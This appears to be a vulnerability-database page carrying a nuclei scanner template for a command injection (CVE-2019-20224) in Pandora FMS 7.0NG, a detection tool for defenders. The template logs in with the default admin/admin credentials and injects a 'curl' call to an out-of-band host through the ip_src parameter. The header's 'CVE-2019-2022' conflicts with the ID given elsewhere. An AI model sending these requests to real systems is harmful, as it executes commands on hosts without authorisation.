Pandora FMS 7.0NG - Remote Command Injection

Published: 02 Jul 2026 09:36:57
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Pandora FMS 7.0NG - Remote Command Injection, CVE-2019-2022

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Pandora 7.0NG - Remote Code Execution Exploit | 11 Jan 2020 00:00 | zdt |
| Circl | CVE-2019-20224 | 18 Jan 2020 13:24 | circl |
| CNVD | Pandora FMS Remote Code Execution Vulnerability | 13 Jan 2020 00:00 | cnvd |
| Check Point Advisories | Pandora FMS Command Injection (CVE-2019-20224) | 26 Jan 2020 00:00 | checkpoint_advisories |
| CVE | CVE-2019-20224 | 9 Jan 2020 15:37 | cve |
| Cvelist | CVE-2019-20224 | 9 Jan 2020 15:37 | cvelist |
| Exploit DB | Pandora 7.0NG - Remote Code Execution | 10 Jan 2020 00:00 | exploitdb |
| exploitpack | Pandora 7.0NG - Remote Code Execution | 10 Jan 2020 00:00 | exploitpack |
| NVD | CVE-2019-20224 | 9 Jan 2020 16:15 | nvd |
| OSV | CVE-2019-20224 | 9 Jan 2020 16:15 | osv |

id: CVE-2019-20224

info:
  name: Pandora FMS 7.0NG - Remote Command Injection
  author: ritikchaddha
  severity: high
  description: |
    Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
  remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
  reference:
    - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
    - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20224
    - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view
    - https://pandorafms.com/downloads/solved-pandorafms-742.mp4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-20224
    cwe-id: CWE-78
    epss-score: 0.50615
    epss-percentile: 0.9878
    cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica,vuln

http:
  - raw:
      - |
        POST /pandora_console/index.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nick=admin&pass=admin&login_button=Login
      - |
        POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        name: "http"
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204052d5fde5b4da0099fd2d17f8b1a96561317fbd1a5232ddcb86cdb34e7e1a0b022100928db4c715a8616567f68965cdb31837e6b9badc2de91a23ca2a962d22016067:922c64590222798bb761d5b6d8e72950

Scores (04 Feb 2026 07:00, current):
Vulners AI Score: 7.5 (High risk)
CVSS 3.1: 8.8
CVSS 2: 9
EPSS: 0.50615